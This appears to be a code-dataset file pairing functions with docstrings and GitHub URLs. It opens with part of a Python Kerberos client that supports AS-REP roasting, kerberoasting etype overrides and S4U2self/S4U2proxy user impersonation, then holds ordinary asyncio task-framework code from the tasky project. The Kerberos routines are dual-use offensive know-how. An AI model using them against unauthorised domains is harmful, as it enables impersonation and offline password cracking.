#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt
#so we just return, the asrep can be extracted from this object anyhow
if decrypt_tgt == False:
return
self.kerberos_cipher = _enctype_table[23]
self.kerberos_cipher_type = 23
self.kerberos_key = Key(self.kerberos_cipher.enctype, self.usercreds.get_key_for_enctype(EncryptionType.ARCFOUR_HMAC_MD5))
else:
if rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:
raise KerberosError(rep)
rep = rep.native
logger.debug('Got reply from server, asikg to provide auth data')
rep = self.do_preauth(rep)
logger.debug('Got valid TGT response from server')
rep = rep.native
self.kerberos_TGT = rep
cipherText = rep['enc-part']['cipher']
temp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)
self.kerberos_TGT_encpart = EncASRepPart.load(temp).native
self.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])
self.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)
logger.debug('Got valid TGT')
return
def get_TGS(self, spn_user, override_etype = None):
"""
Requests a TGS ticket for the specified user.
Retruns the TGS ticket, end the decrpyted encTGSRepPart.
spn_user: KerberosTarget: the service user you want to get TGS for.
override_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to recieve whatever tgs tiecket
"""
#construct tgs_req
logger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())
now = datetime.datetime.utcnow()
kdc_req_body = {}
kdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))
kdc_req_body['realm'] = spn_user.domain.upper()
kdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
kdc_req_body['till'] = now + datetime.timedelta(days=1)
kdc_req_body['nonce'] = secrets.randbits(31)
if override_etype:
kdc_req_body['etype'] = override_etype
else:
kdc_req_body['etype'] = [self.kerberos_cipher_type]
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_1 = {}
pa_data_1['padata-type'] = PaDataType.TGS_REQ.value
pa_data_1['padata-value'] = AP_REQ(ap_req).dump()
kdc_req = {}
kdc_req['pvno'] = krb5_pvno
kdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
kdc_req['padata'] = [pa_data_1]
kdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)
req = TGS_REQ(kdc_req)
logger.debug('Constructing TGS request to server')
rep = self.ksoc.sendrecv(req.dump())
logger.debug('Got TGS reply, decrypting...')
tgs = rep.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169
def S4U2self(self, user_to_impersonate, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
#def S4U2self(self, user_to_impersonate, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
"""
user_to_impersonate : KerberosTarget class
"""
if not self.kerberos_TGT:
logger.debug('S4U2self invoked, but TGT is not available! Fetching TGT...')
self.get_TGT()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
auth_package_name = 'Kerberos'
now = datetime.datetime.utcnow()
###### Calculating authenticator data
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_data_auth = {}
pa_data_auth['padata-type'] = PaDataType.TGS_REQ.value
pa_data_auth['padata-value'] = AP_REQ(ap_req).dump()
###### Calculating checksum data
S4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)
S4UByteArray += user_to_impersonate.username.encode()
S4UByteArray += user_to_impersonate.domain.encode()
S4UByteArray += auth_package_name.encode()
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray.hex())
logger.debug('S4U2self: S4UByteArray: %s' % S4UByteArray)
chksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)
logger.debug('S4U2self: chksum_data: %s' % chksum_data.hex())
chksum = {}
chksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))
chksum['checksum'] = chksum_data
###### Filling out PA-FOR-USER data for impersonation
pa_for_user_enc = {}
pa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})
pa_for_user_enc['userRealm'] = user_to_impersonate.domain
pa_for_user_enc['cksum'] = Checksum(chksum)
pa_for_user_enc['auth-package'] = auth_package_name
pa_for_user = {}
pa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))
pa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()
###### Constructing body
krb_tgs_body = {}
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': [self.usercreds.username]})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_data_auth, pa_for_user]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
logger.debug('Sending S4U2self request to server')
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
logger.debug('Got S4U2self reply, decrypting...')
tgs = reply.native
encTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native
key = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])
self.ccache.add_tgs(tgs, encTGSRepPart)
logger.debug('Got valid TGS reply')
self.kerberos_TGS = tgs
return tgs, encTGSRepPart, key
# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b
def S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):
now = datetime.datetime.utcnow()
supp_enc = self.usercreds.get_preferred_enctype(supp_enc_methods)
pa_pac_opts = {}
pa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))
pa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
authenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ap-options'] = APOptions(set())
ap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
pa_tgs_req = {}
pa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value
pa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()
krb_tgs_body = {}
#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))
krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))
krb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})
krb_tgs_body['realm'] = self.usercreds.domain.upper()
krb_tgs_body['till'] = now + datetime.timedelta(days=1)
krb_tgs_body['nonce'] = secrets.randbits(31)
krb_tgs_body['etype'] = [supp_enc.value] #selecting according to server's preferences
krb_tgs_body['additional-tickets'] = [s4uself_ticket]
krb_tgs_req = {}
krb_tgs_req['pvno'] = krb5_pvno
krb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value
krb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]
krb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)
req = TGS_REQ(krb_tgs_req)
try:
reply = self.ksoc.sendrecv(req.dump())
except KerberosError as e:
if e.errorcode.value == 16:
logger.error('S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account! Full error: %s' % e)
raise e
def get_something(self, tgs, encTGSRepPart, sessionkey):
now = datetime.datetime.utcnow()
authenticator_data = {}
authenticator_data['authenticator-vno'] = krb5_pvno
authenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])
authenticator_data['cname'] = self.kerberos_TGT['cname']
authenticator_data['cusec'] = now.microsecond
authenticator_data['ctime'] = now
print(encTGSRepPart['key']['keytype'])
cipher = _enctype_table[encTGSRepPart['key']['keytype']]
authenticator_data_enc = cipher.encrypt(sessionkey, 11, Authenticator(authenticator_data).dump(), None)
ap_req = {}
ap_req['pvno'] = krb5_pvno
ap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value
ap_req['ticket'] = Ticket(tgs['ticket'])
ap_req['ap-options'] = APOptions(set([]))
ap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})
return AP_REQ(ap_req).dump()
|
jreese/tasky | tasky/tasks/task.py | Task.sleep | python | async def sleep(self, duration: float=0.0) -> None:
'''Simple wrapper around `asyncio.sleep()`.'''
duration = max(0, duration)
if duration > 0:
Log.debug('sleeping task %s for %.1f seconds', self.name, duration)
await asyncio.sleep(duration) | Simple wrapper around `asyncio.sleep()`. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/task.py#L71-L77 | null | class Task(object):
'''Run methods on the asyncio event loop and keep track of them.'''
def __init__(self) -> None:
'''Initialize task state. Be sure to call `super().__init__()` if
you need to override this method.'''
self.task = None # asyncio.Task
self.tasky = None # Tasky manager
self.running = False
@property
def name(self) -> str:
'''This task's name.'''
return self.__class__.__name__
@property
def enabled(self) -> bool:
'''Return true if this task is enabled and should be running.'''
return True
@property
def config(self) -> 'Config':
'''Task-specific configuration data.'''
return self.tasky.configuration.task_config(self)
@property
def global_config(self) -> 'Config':
'''Global configuration data.'''
return self.tasky.configuration.global_config()
@property
def counters(self) -> 'DictWrapper':
return self.tasky.stats.task_counter(self)
async def init(self) -> None:
'''Override this method to initialize state for your task.'''
pass
async def execute(self, *args, **kwargs):
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
return await self.tasky.execute(*args, **kwargs)
async def run(self) -> None:
'''Override this method to define what happens when your task runs.'''
pass
async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops.'''
await self.run()
def time(self) -> float:
'''Return the current time on the asyncio event loop.'''
return self.tasky.loop.time()
async def stop(self, force: bool=False) -> None:
'''Cancel the task if it hasn't yet started, or tell it to
gracefully stop running if it has.'''
Log.debug('stopping task %s', self.name)
self.running = False
if force:
self.task.cancel()
|
jreese/tasky | tasky/tasks/task.py | Task.stop | python | async def stop(self, force: bool=False) -> None:
'''Cancel the task if it hasn't yet started, or tell it to
gracefully stop running if it has.'''
Log.debug('stopping task %s', self.name)
self.running = False
if force:
self.task.cancel() | Cancel the task if it hasn't yet started, or tell it to
gracefully stop running if it has. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/tasks/task.py#L84-L92 | null | class Task(object):
'''Run methods on the asyncio event loop and keep track of them.'''
def __init__(self) -> None:
'''Initialize task state. Be sure to call `super().__init__()` if
you need to override this method.'''
self.task = None # asyncio.Task
self.tasky = None # Tasky manager
self.running = False
@property
def name(self) -> str:
'''This task's name.'''
return self.__class__.__name__
@property
def enabled(self) -> bool:
'''Return true if this task is enabled and should be running.'''
return True
@property
def config(self) -> 'Config':
'''Task-specific configuration data.'''
return self.tasky.configuration.task_config(self)
@property
def global_config(self) -> 'Config':
'''Global configuration data.'''
return self.tasky.configuration.global_config()
@property
def counters(self) -> 'DictWrapper':
return self.tasky.stats.task_counter(self)
async def init(self) -> None:
'''Override this method to initialize state for your task.'''
pass
async def execute(self, *args, **kwargs):
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
return await self.tasky.execute(*args, **kwargs)
async def run(self) -> None:
'''Override this method to define what happens when your task runs.'''
pass
async def run_task(self) -> None:
'''Execute the task inside the asyncio event loop. Track the time it
takes to run, and log when it starts/stops.'''
await self.run()
async def sleep(self, duration: float=0.0) -> None:
'''Simple wrapper around `asyncio.sleep()`.'''
duration = max(0, duration)
if duration > 0:
Log.debug('sleeping task %s for %.1f seconds', self.name, duration)
await asyncio.sleep(duration)
def time(self) -> float:
'''Return the current time on the asyncio event loop.'''
return self.tasky.loop.time()
|
jreese/tasky | tasky/loop.py | Tasky.task | python | def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None | Return a running Task object matching the given name or class. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L79-L89 | null | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time()
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.init | python | async def init(self) -> None:
'''Initialize configuration and start tasks.'''
self.stats = await self.insert(self.stats)
self.configuration = await self.insert(self.configuration)
if not self.executor:
try:
max_workers = self.config.get('executor_workers')
except Exception:
max_workers = None
self.executor = ThreadPoolExecutor(max_workers=max_workers)
for task in self.initial_tasks:
await self.insert(task)
self.monitor = asyncio.ensure_future(self.monitor_tasks())
self.counters['alive_since'] = time.time() | Initialize configuration and start tasks. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L91-L109 | [
"async def insert(self, task: Task) -> None:\n '''Insert the given task class into the Tasky event loop.'''\n\n if not isinstance(task, Task):\n task = task()\n\n if task.name not in self.all_tasks:\n task.tasky = self\n self.all_tasks[task.name] = task\n\n await task.init()\n\n... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
debug: bool=False) -> None:
'''Initialize Tasky and automatically start a list of tasks.
One of the following methods must be called on the resulting objects
to start the event loop: `run_forever()`, `run_until_complete()`, or
`run_for_time()`.'''
if uvloop:
Log.debug('using uvloop event loop')
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
self.loop = asyncio.new_event_loop()
self.loop.add_signal_handler(signal.SIGINT, self.sigint)
self.loop.add_signal_handler(signal.SIGTERM, self.sigterm)
self.loop.set_exception_handler(self.exception)
asyncio.set_event_loop(self.loop)
if debug:
Log.debug('enabling asyncio debug mode')
self.loop.set_debug(True)
self.all_tasks = {}
self.running_tasks = set()
self.initial_tasks = list(task_list)
self.configuration = config
self.stats = stats
self.executor = executor
self.monitor = False
self.terminate_on_finish = False
self.stop_attempts = 0
@property
def config(self) -> Any:
'''Return configuration data for the root service.'''
return self.configuration.global_config()
@property
def counters(self) -> DictWrapper:
'''Dict-like structure for tracking global stats.'''
return self.stats.global_counter()
def task(self, name_or_class: Any) -> Task:
'''Return a running Task object matching the given name or class.'''
if name_or_class in self.all_tasks:
return self.all_tasks[name_or_class]
try:
return self.all_tasks.get(name_or_class.__class__.__name__, None)
except AttributeError:
return None
async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task
async def execute(self, fn, *args, **kwargs) -> None:
'''Execute an arbitrary function outside the event loop using
a shared Executor.'''
fn = functools.partial(fn, *args, **kwargs)
return await self.loop.run_in_executor(self.executor, fn)
def run_forever(self) -> None:
'''Execute the tasky/asyncio event loop until terminated.'''
Log.debug('running event loop until terminated')
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_until_complete(self) -> None:
'''Execute the tasky/asyncio event loop until all tasks finish.'''
Log.debug('running event loop until all tasks completed')
self.terminate_on_finish = True
asyncio.ensure_future(self.init())
self.loop.run_forever()
self.loop.close()
def run_for_time(self, duration: float=10.0) -> None:
'''Execute the tasky/asyncio event loop for `duration` seconds.'''
Log.debug('running event loop for %.1f seconds', duration)
try:
asyncio.ensure_future(self.init())
self.loop.run_until_complete(asyncio.sleep(duration))
self.terminate()
self.loop.run_forever()
except RuntimeError as e:
if not e.args[0].startswith('Event loop stopped'):
raise
finally:
self.loop.close()
def terminate(self, *, force: bool=False, timeout: float=30.0,
step: float=1.0) -> None:
'''Stop all scheduled and/or executing tasks, first by asking nicely,
and then by waiting up to `timeout` seconds before forcefully stopping
the asyncio event loop.'''
if isinstance(self.monitor, asyncio.Future):
Log.debug('cancelling task monitor')
self.monitor.cancel()
Log.debug('stopping tasks')
for task in list(self.running_tasks):
if task.task.done():
Log.debug('task %s already stopped', task.name)
self.running_tasks.discard(task)
else:
Log.debug('asking %s to stop', task.name)
asyncio.ensure_future(task.stop(force=force))
if timeout > 0 and (self.monitor or self.running_tasks):
Log.debug('waiting %.1f seconds for remaining tasks (%d)...',
timeout, len(self.running_tasks))
timeout -= step
fn = functools.partial(self.terminate, force=force,
timeout=timeout, step=step)
return self.loop.call_later(step, fn)
if timeout > 0:
Log.debug('all tasks completed, stopping event loop')
else:
Log.debug('timed out waiting for tasks, stopping event loop')
self.loop.stop()
async def start_task(self, task: Task) -> None:
'''Initialize the task, queue it for execution, add the done callback,
and keep track of it for when tasks need to be stopped.'''
try:
Log.debug('task %s starting', task.name)
before = time.time()
task.counters['last_run'] = before
task.running = True
self.running_tasks.add(task)
await task.run_task()
Log.debug('task %s completed', task.name)
except CancelledError:
Log.debug('task %s cancelled', task.name)
except Exception:
Log.exception('unhandled exception in task %s', task.name)
finally:
self.running_tasks.discard(task)
task.running = False
task.task = None
after = time.time()
total = after - before
task.counters['last_completed'] = after
task.counters['duration'] = total
async def monitor_tasks(self, interval: float=1.0) -> None:
'''Monitor all known tasks for run state. Ensure that enabled tasks
are running, and that disabled tasks are stopped.'''
Log.debug('monitor running')
while True:
try:
await asyncio.sleep(interval)
for name, task in self.all_tasks.items():
if self.terminate_on_finish:
if task in self.running_tasks and task.running:
await task.stop()
elif task.enabled:
if task not in self.running_tasks:
Log.debug('task %s enabled, restarting', task.name)
await self.insert(task)
else:
if task in self.running_tasks:
Log.debug('task %s disabled, stopping', task.name)
await task.stop()
if self.terminate_on_finish and not self.running_tasks:
Log.debug('all tasks completed, terminating')
break
except CancelledError:
Log.debug('monitor cancelled')
break
except Exception:
Log.exception('monitoring exception')
self.monitor = None
self.loop.call_later(0, self.terminate)
def exception(self, loop: asyncio.BaseEventLoop, context: dict) -> None:
'''Log unhandled exceptions from anywhere in the event loop.'''
Log.error('unhandled exception: %s', context['message'])
Log.error('%s', context)
if 'exception' in context:
Log.error(' %s', context['exception'])
def sigint(self) -> None:
'''Handle the user pressing Ctrl-C by stopping tasks nicely at first,
then forcibly upon further presses.'''
if self.stop_attempts < 1:
Log.info('gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
elif self.stop_attempts < 2:
Log.info('forcefully cancelling tasks')
self.stop_attempts += 1
self.terminate(force=True)
else:
Log.info('forcefully stopping event loop')
self.loop.stop()
def sigterm(self) -> None:
'''Handle SIGTERM from the system by stopping tasks gracefully.
Repeated signals will be ignored while waiting for tasks to finish.'''
if self.stop_attempts < 1:
Log.info('received SIGTERM, gracefully stopping tasks')
self.stop_attempts += 1
self.terminate()
else:
Log.info('received SIGTERM, bravely waiting for tasks')
|
jreese/tasky | tasky/loop.py | Tasky.insert | python | async def insert(self, task: Task) -> None:
'''Insert the given task class into the Tasky event loop.'''
if not isinstance(task, Task):
task = task()
if task.name not in self.all_tasks:
task.tasky = self
self.all_tasks[task.name] = task
await task.init()
elif task != self.all_tasks[task.name]:
raise Exception('Duplicate task %s' % task.name)
if task.enabled:
task.task = asyncio.ensure_future(self.start_task(task))
self.running_tasks.add(task)
else:
task.task = None
return task | Insert the given task class into the Tasky event loop. | train | https://github.com/jreese/tasky/blob/681f4e5a9a60a0eb838b89f320309cfb45a56242/tasky/loop.py#L111-L132 | [
"async def start_task(self, task: Task) -> None:\n '''Initialize the task, queue it for execution, add the done callback,\n and keep track of it for when tasks need to be stopped.'''\n\n try:\n Log.debug('task %s starting', task.name)\n before = time.time()\n task.counters['last_run'] ... | class Tasky(object):
'''Task management framework for asyncio'''
def __init__(self,
task_list: List[Task]=None,
config: Config=Config,
stats: Stats=Stats,
executor: Executor=None,
